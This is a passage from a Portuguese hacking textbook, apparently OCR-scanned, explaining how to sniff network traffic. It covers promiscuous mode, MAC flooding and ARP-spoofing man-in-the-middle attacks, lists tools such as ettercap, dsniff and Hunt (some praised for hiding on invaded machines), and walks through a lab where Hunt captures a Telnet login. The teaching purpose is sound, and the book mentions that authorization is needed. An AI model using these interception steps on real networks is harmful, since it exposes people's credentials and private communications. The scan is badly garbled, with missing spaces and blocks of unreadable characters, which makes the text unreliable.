inetend.:192.168.1.11 Bcast:192.168.1.255 Masc:255.255.255.0
UPBROADCASTRUNNINGMULTICAST MTU:1500 Métrica:1
RXpackets:13567errors:Odropped:Ooverruns:1frame:O
TXpackets:8300errors:Odropped:Ooverruns:Ocarrier:O
co1isões:0
RXbytes:3163776 (3.0Mb)TXbytes:994079 (970.7Kb)
Observeasinformaçõesmostradas.Vocêsabe,pormeiodessecomando,que
oencapsulamentodolink(ouseja,oprotocolodecamada2)éEthernet,queo
MACé00-08-74-B5-64-95,queoendereçoderedeé192.168.1.11,queotama-
nhomáximodopacoteEthernet(MTU)éde1.500bytes,etc...Hátambém
algunsflagsqueindicamseainterfaceestáprontaou"empé"(DP),seestá
rodando(RUNNING)eserespondeabroadcastoumulticast.Agoravejamoso
queacontececomocomandoabaixo:
#ifconfigethOpromisc
Aparentemente,nadaacontece.Oshellnosdevolveopromptenenhuma
mensagemdeerrooudetarefaconlcuídaémostrada.Mas,seemitirmosnova-
menteocomandoifconfigethO,oresultadoseriaumpoucodiferente:
12721
Ataque,defesaecontra-ataque:Invasão[

Universidade3°ano
Encapsulamento doLink:EthernetEndereçodeHW00:08:74:B5:64:95
inetend.:192.168.1.11 Bcast:192.168.1.255 Masc:255.255.255.0
UPBROADCASTRUNNINGPROMISCMULTICAST MTU:1500 Métrica:1
RXpackets:13567errors:Odropped:Ooverruns:1frame:O
TXpackets:8300errors:Odropped:Ooverruns:Ocarrier:Ocolisões:O
RXbytes:3163776 (3.0Mb)TXbytes:994079 (970.7Kb)
Bingo!Observequeaplacaagoraestáemmodopromíscuo(flagPROMISC).
AbsolutamenteTUDOoqueestátrafegandonaredeéinterpretadopelapilha
TCP/lPdokemelepode,portanto,sermonitorado.Issoincluipacotesnão
direcionadosaessamáquina.
Sniffingpassivo
Asredeslocaisnormalmen-
teseutilizamdeequipamen-
toschamadoshubs(capítulos
RedesIelI)parafacilitare
flexibilizaraconexãodeno-
vasmáquinasaumaredeexis-
tente.Ohubageaindacomo
umelementoregeneradordo
sinalelétricopresenteno
barramentoderede.Maso
hubéumelementopassivo
notocanteacontroledotrá-
fegonaredelocal.
Hubserepetidoressão
equipamentosquetraba-
lhamnacamada1domo-
deloOSI,portantonãotêmcontrolealgumsobreoquadroEthemet(ouqual-
queroutroprotocolodecamada2comoTokenRing,PPp,FrameRelayou
X.25).Issosignificaqueumamensagemenviadadeumamáquinaparaaou-
traseráouvidaportodasnarede.
Éfácilperceber,nodesenhoacima,queseamáquinaAenviarumamensa-
gemparaaC,asestaçõesB,DeHaindaestarão"ouvindo".Portanto,apesar
daaparênciadeestrela,umaredequeseutilizedeumhubparainterligar
asmáquinasé,narealidade,umbarramento.
Concluímosqueémuitofácilparaumsnifferregistraredecodificartudo
oquetrafeganessarede.Comotrabalhacominterfacesemmodopromís-
cuo,todosospacotesdaredepodemserinterpretados.Masesearede
estiversegmentadacombridgesouswitches?
1273I
]Ataque,defesaecontra-ataque:Invasão

IUniversidadeH4CK3R I
Nocapítulo2(RedesI)vimosenpassantadescriçãodessesequipamentos.
Umabridgedividearedeemdoissegmentosebloqueiatráfegonãodestinado
cadaumdeles.
Observe:asmáquinasAeBestãonosegmento1,enquantoCeDnosegmen-
to2.Isolandoosdois,umabridge.OtráfegodeAparaBedeBparaAfica
restritoaosegmento1,eotráfegodeCparaDedeDparaCficarestritoao
segmento2.Abridgebloqueiaotráfegolocal,nãodeixandoquemensagens
nãoendereçadasaumbarramentoemespecialcheguemnele.
XIBridge
'X
/t::: /t::: BloqueadopelaBridge
Entretanto,seamáquinaCquerenviarumamensagemparaamáquinaA,a
bridgedeixapassaropacote.
Bridge
Deixapassar
12741
Ataque,defesaecontra-ataque:Invasão[

Universidade3°ano
Adeterminaçãodequaispa-
cotesdevempassarequaisde-
vemserbloqueadosédinâmi-
ca,baseadanosendereçosMAC
dasinterfacesderede.Nomo-
mentoqueumabridgeéligada,
elanãotemnadanamemória.
Àmedidaqueasestaçõesvão
enviandopacotesparaarede,a
bridgeguardaosMACAdresses
~~
~
---
numatabela,relacionando-os ..~
.
.
comosegmentodeondeopa- ~~.
coteseoriginou.Notequetudo ~
sepassanacamada2domodeloOSI:abridgesótemconhecimentodasmáquinas
ligadasdiretamenteemsuaredelocal.
Imagine,agora,umhubquepossuísseumabridgeemcadaporta.Cadamáquina
daredereceberiaapenastráfegodestinadoasi.Esse"monstrengoexisteesecha-
macomutadorouswitch.Observe:assimcomoemnossoprimeiroexemplo,aesta-
çãoAquerenviarumamensagemparaaestaçãoB.Devidoaoswitch,nenhumadas
outrasmáquinasiráescutaroqueAtemadizer.Alémdisso,CpoderiafalarcomE
simultaneamente,poisaredeestá,paraelas,ociosa.
Umaredecomumswitchnolugardeumhub,alémdocontroleediminuição
dotráfego,tambémofereceriaumasegurançaadicionalàrede,umavezque
umsnifferinstalado,porexemplo,emDnãopoderiaescutarnadadasconver-
sasentreAeBouCeE.Ousodebridgeseswitches,então,minimizariao
problemadossniffers,certo?Infelizmente,maisumavez,arespostaénão...
Sniffingativo
UmswitchoubridgepossuiumatabelaquerelacionaosMACaddressesque
"ouviu"naredecomasportasousegmentosnosquaisforam"ouvidos".Como
épreenchidadinamicamente,essatabelaseráatualizadatodavezqueuma
novamáquinaforconectadaàrede.
Comodiziaumparentemeu(ilustre,masiletrado),"tudooqueédemaiséem
demazia"(sic).Amemóriadoswitchpossuiumtamanholimitado,portantoum
númeromuitograndedeinterfacesderedeligadasemcadaumadasportaspode-
ria,numcasoextremo,preenchê-Iacompletamente.Pensandonisso,osfabricantes
dessesequipamentosasdimensionamparaqueesselimitenuncasejaatingido.
OproblemaéqueumquadroEthemetnadamaisédoqueumaseqüênciadeuns
ezerosquepode,porissomesmo,sermanipulada.Umprogramacuidadosamente
escritopoderiagerar,adinfinitum,framesEthemetcomMACadressesaleatórios
e,emalgunsminutos,preenchercompletamenteamemóriadoswitch.Comoo
shownãopodeparar,essesequipamentospodemcomeçararepassarmensagens
indiscriminadamenteparatodasasportas.EssatécnicaéchamadadeMACFlooding.
1275I
]Ataque,defesaecontra-ataque:Invasão

IUniversidadeH4CK3RI
Umaveznessasituação,qual-
quersnifferpoderáfarejara
rede.Háferramentasquefazem
isso(umadelas,escritaemPerI,
pode serencontrada em
www.safenetworks.com/
Others/~com4.html), masos
sniffersmaismodernos(como
oettercapeodsniff)jáfazem
todootrabalho.
Felizmente(ouinfelizmente,
dependendodosintentosdoes-
timadoleitor),algunsswii:ches
sãoimunesaoMACFlooding.
Háváriasmaneirasdeimplementarswitchesassim.Podemserusadosalgoritmos
deproteçãoqueimpedemqueamemóriasejacompletamente preenchida.Ou
entãoumsistemadedetecçãodeflood,baseadoempadrõesdedadoseum
knlowledgebasedossniffersconhecidos.Umaterceiramaneiraseriaadotar
umapolíticadepersistência,mantendoMACsconhecidoshámaistempoem
detrimentodenovasinterfaces,casoamemórialote.
Paracontornaresseinconveniente,oshackersdesenvolveramumatécnicacha-
mada
ARPSpoofing.Éumatécnicaumpoucomaiscomplicada,masmuitointe-
ligente.Emvezdetrabalharapenasnacamada2(Ethernet)oinvasorvaiconfun-
dirocomputadorcujotráfegosedeseja"esnifar"manipulandosuatabelaARP.
OARP,comodiscutidoanteriormente,éummecanismodetraduçãoIP-para-
MAC.Amáquinaquequerenviaropacotepergunta,narede:"QuemtemoIP
tal"?Todasasmáquinasdaquelesegmentoouvemapergunta,masapenasa
interfacequepossuiaquele IP=10.0.0.1
IPresponde:"Soueu,meu MAC=xx.xx.xx
MACé :XXXXXX".A partir
disso,ainterfacedeorigem
montaumquadroEthernet
eoenviaaodestino.OARP
Spoofmgéumamaneirade
enganaramáquinadavíti-
ma,fazendo-aacreditarque
oendereçoMACdamáqui-
naondeosnifferestá
correspondeaoendereçoIP
damáquina-destinooriginal.
Complicado?Sim,é.Vamos
tentarexemplificar:
12761
Ataque,defesaecontra-ataque:Invasão [
IP=1O.O.OA
MAC=ww.ww.ww
ConfiguraH
CD
parareenviaraB
tudoquechega
~
SnilferAtivo:preparação

Universidade3°ano
Nodiagramamostrado,aestaçãoAquerfalarcomaestaçãoB.Apartirda
estaçãoH,umhackerquerfarejaracomunicaçãoentreAeB.Paraisso,é
necessárioumapreparaçãoprévia.Aprimeiracoisaqueohackerdevefazer
éconfigurarseusistemaoperacionaldeHpararepassartodoequalquer
tráfegoquechegueparasi,vindodeA,paraaverdadeiramáquinadestino,
queéB.AconfiguraçãodoIPforwardingnormalmenteéfeitapeloprórpio
sniffer,masépossívelqueemalgunscasossejanecessáriofazê-Iomanual-
mente.TantoWindowsquantoNetwareetambémqualquerUnixpermitem
essetipoderedirecionamento.Lembra-sedaquelemapadarede,feitocom
ping+traceroute(oucomoCheops)?Eleserámuitoútilagora.
OsegundopassoéenganaramáquinaA,fazendo-aacreditarqueoIPdeB
possuioMACdeH.IssoéconseguidofazendoHenviarumnúmeromonstruoso
derespostasARPparaA,informandoqueoIPdeBpossuioMACdeH
-respos-
tasessasquesequerforamsoli-
citadas.Depoisdeumcertotem-
po,A"pensa"que,paramandar
mensagensparaoIPdeB,tem
queconstruirquadrosEthemet
direcionadosaoMACdeH.
Agoraésóativarseusniffer
preferidoeesperar.Otráfego
vindodeAemdireçãoaBvai
passarporHantes.NemAnem
Bvãodesconfiardisso,pois,para
eles,acomunicaçãoéapenasen-
treosdois.Essetipodeconfigu-
raçãodeataqueénormalmente
chamadode"maninthemiddle".
SnifferAtivo:ação!
Escolhendoseusabujo
Háumnúmerogigantescodeferramentasdesniffingquepodemserusadas
emdiversasplataformas.Eisalguns:
~tcpdump(www.tcpdump.org).aferramentanativademonitoramento
derededequalquerUnix.Jávimosofuncionamentodotcpdumpnocapítulo
RedeslI.Colocandoaplacaderedeemmodopromíscuo(porexemplo,com
ifconfignoLinux)erodandootcpdump,tem-seomaisbásicopossível(mas
nãoporissomenoseficiente)snifferderedeparaUnix.Avantagemdese
usarotcpdumpéquetodososUnicesjáopossuem-oinvasornãoprecisa
instalarnada,sórodaroprogramaedirecionarasaídaparaumarquivo.O
comandoseria:
12771
IAtaque,defesaecontra-ataque:Invasão

IUniversidadeH4CK3RI
#tcpdump[opções]>arquivo.de.saída
UmaversãodotcpdumpparaWindowspodeserencontradaem
windump.polito.it.
JPTraf
TCPConnections(SOU''C8Host:Por.t)- P"ckets-B~tesF1""sFace
r-I--65-71-187-100.dsl.d<C\P<...:358E > 8441263J48--A-ethO
mflj-bocd..ozmo.mo,1214 > 511 26374--A-ethO
[68.10.252.64.sret.oot,3676 > 651962504--A-ethO
mflj-bocd..ozmo.mo,1214 > 465 21816--A-ethO
rlXPOl238"108pcs.frsrc101..i.moca,1214 > 515~32--A-ethO
mflj-bocd..ozmo.mo'l176 > 390 18006--A-ethO
[ool"18ba()fc2.~."'tmlire.net'l~ > 3164n352--A-ethO
208.100.255.153,2019 > 225 1=--A-ethO
e16.49.88.~00:www = 4 1246-PA-ethO I61.9.18.19.1298 7 878-PA-ethO
J
pcO:H>acd..ozmo.mo'3329 199 11885--A-ethO
rserver13.íicinternet.coo:www = 193 292671-A- ethO
TCP:
18Ü9entr'ies fk:tive
Ib1-IP(M)(162~) fmo~4 to0180c200000000ethO
~~~(JIT~f'f:'(~T:Er~~~~~~:~f~~f~'i
H}f'echorply(84~)fw1.scd.yaIuo.motorikEr.'ozcuo.mo(src- I
frn-IP(M)(13O~) fmo~ to01~ onelliJ. '
,,~IP(M)(~-~) fmo~ to018Oc2Ooo0ooonelliJ., !
~IPTraf(iptraf.seul.org),O
avôdetodosossniffersUnix,
aindapodeserefetivamente
usadoemumasessãode
sniffing.Apesardesuaidade,
possuirecursospoderosos.
Valeapenadarumaconferida.
Umadesuasvantagenséque,
comootcpdump,écomum
encontrá-Iojáinstalado-pou-
pandotrabalho,recursosenão
levantandosuspeitas.
~Ethereal(www.ethereal.com).umsnifferpoderoso,quesuportavários
protocolos,marca-oscomcoresdiferenteseinterpretaseussignificados.Pos-
suiumainterfacegráficamuitíssimoamigável.Émaisusadaporadministrado-
res,maséútiltambémparacrackersmalintencionados.Disponívelpara
WindowseUnix.Osautoresrecomendam.
ff:ff:ff:ff:ff:ff
bam.zing.or"
192.168.0.1
bam.zing.org
slashdot.org
b"nqing.arg
slashdot.org
slashdot.org
bam.zing.org
110.29"019bam.zing.org
120.294194slashdot.org
130.298fi41bam.zing.or9
140.370983slashdot.org
150.372207slashdet.erg
,:"~",i~MM
51ashdot.org
bam.zing.org
slashdot.org
bam.zing.erg
bam.zing.org
d25.hoo"or"
TCP
HTTP
TCP
HTTP
HTTP
Ten
Whohas192.1&8.0.1?Tel1192.168.0.2
192.168.0.115 atOO:eO:29:68:8b:fb
StandardqueryA51ashdot.org
StandardqueryrasponseA64.28.67.150
2741>'li"'![SVN]Seq~195095a524Açk=OWin-321
'li"'!>2741[SVN,ACK]Seq-1976068085Ack-1950
2741>'li"'!(ACK]Seq-1950958525Ack-197Gü680E
GET/Hm/1.1
'li"'!>2741 IACK]Seq-1976068086Ack-19509591E
GUJIfJi"-"'."
2741>'li"'! [ACKJSeq-1950959165Ack=19760695,
Continuation
274.1>'li"'![ACK]Seq-1950959165Ack-197607098
Continuation
Continua,tion
ltIFrame10(1514onwire.1514<aptured)
ltIEthernetII
ItIInternetPretocol.SrcAddr:slashdot.org(64.28.67.150).OstAddr:bam.zing.org(192.168.0.2)
HlTran5missionControlProtocoloSrcPorto'li"'!(80),OstPorto2741(2741).Seq:1976068086.Ack:
SHypertextTrahsferprotocol
HTTP/1.1200OK
Date:Wed,02]an200200:52:37GI>If
Server:Apache/1.3.20(Unix)mod_per1/1.25mod_gzip/1.3.19.1a
X-Power.d~By:Slash2.003000
X-Bender:Intheeventefaoemergency.mya5S<anbeusedasaflotationdevice.
1950959165.Len:
2781
Ataque,defesaecontra-ataque:Invasão

Universidade3°ano
O"""",,,
7'",,,",,""""
"'",,,,,
""°""",,,,,,,,,,,
'M'","n,'"""'mCi,]d,0,"0com
"',','""","
",""fi""",O,OO63
,»,,"°'",
",,,.",,ff,,",
,,~,,1i..,6<
'''''''',m(O""
""',,,h,,'"~,°,,,,,("n,U)
",,""°.'.1."'''.1.1.05)
°""",,,,",b,""h'",.'~("o.","',
V'''"~''''''''"ff''"",,,1.,,,"ci,'"'"(,
5o"",,,,,,",",,",",
°'>1'''''00,,,,,_(60)
""'""o",",,"'''°s
""""',d,,,,,o',..o",m'580121
""',,,.."h'"'"''
P»"..0,00'"U'C<'
Wiooo",""3"6<
"_'d,>,,''''oo'".TE",.'Ç~.".""MO".01,",h_,
,,,,,,,'..',
"_'1,,,",,,,',wn:""''"~'"""",.jp'''.'00.""".""d,.
R;;:;;';i';hi:;'~RE::"I;i,1:';;;'''''-''''iim'«'"'"'''''''
;'h","",h'",5h""'''''''-C~","it"'',""'h''I'ITlE'
:;"'''''mm,'mor,'",o""oo'""~.,,,o",W"'"'.''''",,",0'AU",-""'",""',
"""...,,,""",,,,..,,,
::o"i~i~)"H1:i':;';'~:'h1;p~1id-~;:~~H:~;tA):J::~;i,'11i:;::j,h,;i"",h''''"O'tl''''k>lO",
"~'I"",,'"><"OC,,"~'"o."""""'"0~"''""'''",...,,,,,,,,,,,,,..,,"'",,,...""",-0>
"'-"-"p'",'F-'''T"II"ho''3"''''~'.T""",,",,I,''<k/Th'',"",h10''""'''''",',I",",,.'"~,I'
oEtherealpode,inclusive,decodificareextrairinformaçõesapartirdeum
determinadoprotocolo.Noexemploacima,umapáginaHTMLfoidecodificada
dedentrodeumasériedepacotesTCP:
~Sniff'em(www.sniff-em.com).umsniffercomercialparaWindows.Faz
sozinhotudooqueoEthereal,oEttercap,oSnorteoDsnifffazemjuntos,mas
épago.Naopiniãodosautores,nãovalçeapenapagarparateralgoquepode
serobtidogratuitamentecomferramentasmenores,masusuáriosdeWindows
gostamdetertudointegradonumúnicoprograma.Umdosdiferenciasdo
Sniff'emésuacapacidadedemonitorarinterfacesnão-usuaiscomosaídasseriais,
USBemodemsRASeRDSIIISDN.
~Snort(www.snort.org)éumdetectordeintrusos(IDS)queservetam-
bémcomosniffer.Émuitoconhecidoporanalisardeformaperfeitaoslogsdo
Squid.Temaseufavor,alémdesuacoleçãodetruques,umavastalistadeplata-
formasnaqualroda,incluindoaíLinux,Solaris,*BSD,HP-UX,IRIX,MacOSX,
AIXeWindows.
~Sniffit(reptile.rug.ac.be/-coder/sniffit/sniffit.html)trabalhaexclusivamen-
teemUnix,maséveneradopelacomunidadeporsuascapacidadesdesniffing
quaseesotéricas.Possuidoismodosdeoperação.Otradicional(sniffmode)
fazoquequalquersnifferfaz:gravatodootráfegodarede.Umsegundomodo,
chamadodeinterativo,permitequeohackervejaoqueestátrafegandona
redeemtemporeal.Épossívelescolherapenasumprotocoloparamonitorar,
eexistemftltrosqueescondemtodaacomplexidadeinerentedosprotocolos,
mostrandoapenasosdadosúteis.Comosniffit,épossívelinclusiveveroquea
vítimaestádigitandoemumprogramademensagensinstantâneascomoo
MSNMessengerouoICQ
-tudoissoemtemporeal!
1279I
]Ataque,defesaecontra-ataque:Invasão

IUniversidadeH4CK3R I
~Hafiye(www.enderunix.org/hafiye)éumsnifferbaseadoemknowledge-base.
Possuiumbancodedadoscompadrõesdosmaisdiversosprotocolosdecomunica-
çãoecriptografiaeécapazdesepararosdadosúteisdedentrodeumpacote.
~Kismet(www.kismetwire1ess.net)éumfarejadorderedeswire1ess
(802.11)nosmoldesdoIPTrafetcpdump.Alémdesercapazdedecodificaros
protocolospertinentes,conseguedividirasredesporáreaeporcéluladerá-
dio.DesenvolvidoespecialmenteparaLinux,suportanativamenteoPDAZaurus,
daSharp,complacaderedewireless.UmaboapedidaparaWarDriving.
~USBSnoop(sourceforge.net/pro;ects/usbsnoop)monitoraegravatodo
otráfegoentreodriverdodispositivoUSBeoprópriodispositivo.Útilpara
engenhariareversadedrivers(para,porexemplo,produzirumdriverOpen
Source),mastambémpodeserusadoparamonitorarotráfegodemodems
USB.Umaredecriptografadaesuperprotegidapodeser"descadeirada"seum
laptopforligadoaumcomputadordemesaligadoaelapeloUSB.
~APS-AdvancedPacketSniffer(wwws-wrtec.de/clinux)éoutroexemplodepro-
gramaminúsculoquepodeserusadoparafarejarpacotes.Comoéextremamente
dependentedokemel,funcionaapenasemlinux,massuainterfacesimpleseintuitiva
emmodotextopermitesuaoperaçãoremotasemsobrecarregaraconexão.
~Hunt(lin.fsid.cvut.cz/-kra/index.html)nãoéapenasumsniffer,masuma
ferramentacompletadeexploraçãodefalhasnapilhaTCP/lp.Suportatudoo
queumsnifferdevesercapazdeoferecer:vigiardiversostiposdeprotocolos
(ICMp,TCp,ARP),montarmensagensfragmentadasapartirdepacotesTCP
seqüenciais,detectarACKStorms,seqüestrarsessões(hijacking)e"aprender"
osMACsdarede,entremuitosoutrostruques.Porsermuitodidático,éopre-
feridodosprofessoresdecursosderedesesegurança
-foi,inclusive,desen-
volvidoporumprofessordematemáticadaUniversidadedePraga,PavelKrauz.
ComoHunt,podemosfacilmentecolocar-noscomomaninthemidd1enuma
conexão,registrartudooqueestiversendotransmitido,manipularosdadose
atémesmoterminá-Ia(reset).
~ettercap(ettercap.
sourceforge.net)éum
excelentesnifferativo,
ouseja,éespecialpara
serusadoemredescom
switches.SuportaMAC
FloodeARPSpOOflllge
éextremamentefácilde
usar.Comofuncionaem
modotexto,ficafacil-
menteoperacionalem
qualquermáquinaUnix
eéextremamentepe-
queno.Atacarcomo
280
I
Ataque,defesaecontra-ataque:Invasão[

Universidade3°ano
ettercapébrincadeiradecriança:primeiro,escolhe-seaduplademáquinas
quesequermonitorarascomunicações.
Escolhe-se,entreasconexões
TCPouUDPestabelecidas(pode
havermaisdeuma),qualéaque
sequermonitorar.Depoisdisso,
atelamostraosdadosquetrafe-
gamentreasduasmáquinas.
Pode-segravá-Ios,examiná-Iosem
modoASCIIouhexadecimalou
injetarcaracteresnatrasmissão
(eassimmanipularaconexão).
Hápluginsenovosmétodosde
sniffingcomnomessugestivos,
comoPortStealing,Hunt,Confusion...Aspossibilidades-sãoenormes!
~Angst(angst.sourceforge.net),desenvolvidoetestadoparaoOpenBSD,é
umaferramentaquetemaseufavorarobustezeotamanhodiminuto
-além
defazersniffingativo.Possuimenosrecursosqueseusprimosmaisilustres
comooettercapeodsniff,masépequenoobastanteparapassardespercebi-
doemumamáquinainvadida.FuncionatambémcomFreeBSDeSlackware
Linux,outrasplataformasUnixrequeremrecompilaçãoetestes.
~Dsniff(www.monkey.org/-dugsong/dsniff)é,naatualidade,omaisres-
peitadosnifferativopararedescomutadas.Foitestadopelosautoresem
OpenBSDeLinuxemPCseSolarisemmáquinasSunSPARC,masjáfoitestado
empraticamentetodosossaboresUnixconhecidos,entreelesAlX,FreeBSD,
HP-UXeatéMacOSX(blafasel.org/-floh/ports/dsniff-2.3.osx.tgz).Háainda
umaversão(desatualizadamasfuncional)paraWindows,disponívelem
www.datanerds.net/-mike/dsniff.html.
Apesardossniffersmaissimplesseremmaisfáceisde"plantar"eusar,háoutros,
maiselaborados,quesãoverdadeirasobras-de-artedomal.Otcpdumpsozinhoem
umamáquinaUnixjápoderiafazermuitoestrago,etemavantagemdejáestar
instalado.Poroutrolado,máquinasWm9xpermitemqueuminvasor"esnife"arede
(usando,porexemplo,oWmdumpouoEthereal)seminvadirmáquinasmuitocom-
plicadasouseguras.ComoqualquerusuáriodeWm9xtemcontroletotalsobrea
máquina,épossívelrodarumsniffernelasemprecisarquebrarnenhumasenhade
administrador.Ainsegurançainerenteaessaarquiteturaauxiliaoinimigo.Qualquer
servidorouestação,sejamelesUnices,Macintoshes,NetwaresouWmdowsNT/2kj
XP,podeserumperigosemalconfigurados.Entretanto,redescomestaçõesWmdows
95/98/Menuncaserãoseguras,qualquerquesejaoesforçodispendidonelas.
Paramaisopções,procurepor"sniff"noFresmeat(www.freshmeat.net)ou
noGoog1e(www.goog1e.com).Odownload.comtambémpossuidiversasop-
çõesparaWindows,eosCDsdolivrotambémtrazemmaisalgunsdeles.Uma
últimadicasobresniffers(eoutrasferramentas):pedram.redhive.com.
1281
I
1Ataque,defesaecontra-ataque:Invasão

IUniversidadeH4CK3R I
Farejandonaprática
NadacomoumasessãodesniffmgparafIxarosconceitosaprendidos.Poderí-
amosexemplificaresseprocedimentocomumsniffergráficocomooEthereal,
quepossuiumaversãoparaWindowseumabelainterfacedecomando.OEthereal
aindaseparaeinterpretaosprotocolosparavocê,demodoafazeromáximo
possíveldo"trabalhosujo"edeixaraoadministradorderedeapenascomas
informaçõesúteis,"mastigadas".Maslembre-se:sevocêestáexplorandouma
rederemota,possivelmentevaideixarseusnifferrodandosozinhoparadepois
recuperaroarquivocontendootráfego.Ainterfacegráfica,os"frufrus"eainte-
ligênciadoEtherealdenadaadiantarãonesseambiente.
Antesdecomeçarnossoestudo,doislembretes.Emprimeirolugar,observeque
suaconexãodomésticaàInternetprovavelmentesedáporumprotocolodecamada
2chamadodePPPouPoint-to-PointProtocol.Comoonomejádiz,éumprotocolo
pontoaponto:suaredelocalpossuiapenasduasintetfaces,adesuamáquinaeado
modemdoprovedordeacesso.JustamentedevidoaoPPp,vocênãopoderáfarejaro
tráfegonasubrededeInternetàqualvocêestá(aparentemente)conectado.Emuma
ligaçãoempresarial-normalmenteporlinhaprivadausandoFrameRe1ayouX.25
enãoPPP-épossível(emboranãomuitoprováveldevidoaftrewallseroteadores)
queasubrededaInternetdeterminadaparaaempresapossaserfarejada.Dequal-
querforma,umsnifferéútilapenasemestruturasdeconectividadeinternas,ondehá
verdadeiramenteváriasmáquinastrafegandoinformaçõesnamesmaredelocal.
Ooutrolembretenãoémenosimportante.Existemtrêscondiçõesbásicas
parasepoder"esnifar"arede:
1.Existirumaredecompelomenos3máquinas(asduasquesequermonitorar
maisasua,quemonitoraráasoutrasduas).
2.Possuiracessodesuperusuário(rootparaUnixeMacOSXouAdministra-
dorparaWinNT/2k!XP-máquinascomWin9xnãoprecisamdenadadisso...)
namáquinaquefIcaráemmodopromíscuoefarejaráarede.
3.Possuirautorizaçãoparafazeramonitoraçãoealertarosusuáriosdarede
paratal.NãoécondiçãoimpeditivaparainiciarosniffIng,maséético.Todos
têmdireito,garantidoporlei,àprivacidade.Sesuaempresapossuiumapolíti-
cademonitoraçãodetráfego,estadeveserinformadaaosfuncionários.
Issoposto,vamosaoqueinteressa.Emnossoprimeiroestudo,usaremoso
Hunt.Oprogramapossuiumainterfacecomousuárioemmodotextoque,
apesardesingela,émuitofuncional.Nãovamosentraremdetalhessobreainsta-
laçãodoprograma-háintruçõesparaissonadocumentaçãoqueoacompanha.
Emnossarededetestes(LaboratóriodeRedes11),instaleoHuntnamáquina
Unix.Elaseránossamáquina"haxor".Vamosmonitorarumaconexãoentrea
máquinaWindowseamáquina"coitada".Paraquepossamosacompanharme-
lhoraconexão,vamosabrirumasessãodeTelnet,queéumprotocolointerativo
equefuncionaemtextosimples -perfeitaparasermonitoradapelasuasim-
plicidadeebaixavelocidade.Observe:
12821
Ataque,defesaecontra-ataque:Invasão[

Unix
Hunt
192.168.1.3
Coitada
Telnetd
Universidade3°ano Windows
Telnet
NaCoitada(192.168.1.2)estamosrodandorunservidordeTelnet(nãoesqueça
deativá-Io!).NamáquinaUnix,executeoHunt.Serámostradarunatelacomoesta:
/*
*
*
hunt1.5
mu1tipurposeconnectionintruder/snifferforLinux
(c)1998-2000bykra
*
*/
startinghunt
-MainMenu-rcvpktO,free/a11oc63/64---
l/w/r)1ist/watch/reset connections
u) hostuptests
a) arp/simp1ehijack(avoidsackstormifarpused)
s) simp1ehijack
d) daemonsrst/arp/sniff/mac
o) options
x) exit
->
osímbolo->éOpromptdoHunt.Observeomenu.Hárotinasparalistar,
observarederrubarconexões,verificarservidoresonline,fazehijackingetc.
TemosqueconfiguraroHuntparaquepasseaescutarnossarede.Observe:as
opçõesl/w/r,respectivamente,listamtodasasconexõesativas,vigiamuma
delaseinterrompem-na(reset).Paraquefuncionem,énecessárioquehajaalgu-
maconexãoativa.
Escolhaaopção"o"(options)epressioneateclaEnter.Umnovomenuserá
apresentado:;
->o
-options-rcvpkt723,free/a11oc63/64---
1)1istaddconnpo1icy
a/m/d)add/mod/de1connpo1icyentry
c)conn1istproperties macn,seqn
g)suggestmacbase EA:1A:DE:AD:BE:00
h)hostreso1ving n t)arpreqspoofthroughreqy
1283 I
]Ataque,defesaecontra-ataque:Invasão

I
UniversidadeH4CK3R I
r)resetACKstormtimeout
s)simplehijackcmdtimeout
q)arpreq/reppackets
p)numberoflinesperpage
i)printcntrlchars
x)return
-opt> 4s
2s
2
O
y w)switchedenvironment
y)arpspoofwithmymac
e)learnMACfromIPtraffic
v)verbose y
n
n
n
Sãoinúmerasopções.Porenquanto,vamosnosateràsmaisbásicas.Asopções
a/m/dmanipulam oqueéchamado, numatraduçãolivre,deregrasdeconexão.
Basicamente, umaregradeconexão éamaneirapelaqualdizemosaoHunt
quaisconexões queremos monitorar.Vamosadicionarumaregra(opção"a").
-opt>a
srcipaddr/maskports[0.0.0.010]>
oprograma pedeoendereçoIPeamáscaraderededainterfacedeorigem
(src)quequeremosmonitorar.Nonossocaso,ainterfacedeorigem éaquela
quevaifazerconexãocomumservidortelnet,portantocolocaremos aíoIPda
máquinaWindows. Lembrando doqueaprendemos emRedes11,O(zero)quer
dizer"todos".Portanto,colocarumzeroemqualquerlugardoendereçoindica
quetodasasmáquinas comaqueleprefIxoserãomonitoradas. Porexemplo, se
eucolocasse192.168.1.1/32, eumonitorariaospacotesoriginadosnessamá-
quina.Seeucolocasse,poroutrolado,192.168.1.0/24, oHuntfarejariaospa-
cotesdetodasasmáquinas darede192.168.1.0,ouseja,entre192.168.1.1e
192.168.1.254. Numcasoextremo,colocar0.0.0.0/0seriaomesmo quedizer
aoprograma:"VasculheTUDO!"
Demaneirasimilar,preenchaoendereçodedestino.Apróximapergunta
(insertat)ésimplesmenteparadefIniremqueposiçãodalistanossaregra
aparecerá.
Aopção"1"listaasregrasdeconexãoexistentes.Emnossocaso,teríamos:
-opt>1
O)0.0.0.010 [alI]
1)192.168.1.1/32 [alI] <-> O.O.O.O1O[23513]
<->192.168.1.'2/32 [alI]
-opçõesdomenu--
*opt>
Observequetemosumasterisconoprompt.OHuntestánosindicandoque
asmáquinasestão"vivas"narede.Parasairdomodoopções,usaaopção"x".
Devoltaàtelainicial,temosaopçãodelistar("1")asconexõesativas~Experi-
menteeveja:nãohánenhumaconexãonomomento.Vamoscriarumaentão.
:841
Ataque,defesaecontra-ataque:Invasãor

Universidade3°ano
NaestaçãoWindows(192.168.1.1)vamosfazerumaconexãodeTelnetpara
a"Coitada".AbraumajaneladoDOSedigitetelnet192.168.1.2.Setudoesti-
vercerto,vaiaparecerateladelogindamáquina"Coitada"najaneladeTelnet
damáquinaWindows.NamáquinaUnix,volteaoHunteescolhaaopção"I"
novamente.Mágica:apareceuaconexãoentre192.168.1.1e192.168.1.2.A
portadeorigeméalta(comodeveriaser,leiaocapítuloRedes11eaRFCI700),
eadedestinoéa23-aportadoserviçoTelnet.Vamos,então,pediraoHunt
quemostreotráfegoparanós.Escolhaaopção"w"(watch),escolhaqualcone-
xãoquermonitorare,emseguida,aopção"b"(both).
VolteàmáquinaWindowsedêseuloginesenha.SevocêobservarnoHunt,
essasinformaçõesserãomostradaslá.Casoologinsejabemsucedido,opromp
doshellUnixapareceránoTelnetdamáquinaWindows-etambémnatelado
Hunt,queestánumamáquinaquenemparticipoudatransação!Façavárias
experiências:listediretórios,editetextoscomseueditorfavoritoouchame
algumprograma-todasessasatividadesserãomonitoradaspeloHunt.
ParaoHunt,esseéobásico.Porsuasimplicidade,acabaficandolimitadoem
possibilidades,masémuitoútilnamaioriadoscasos.Éóbvioquehámuito
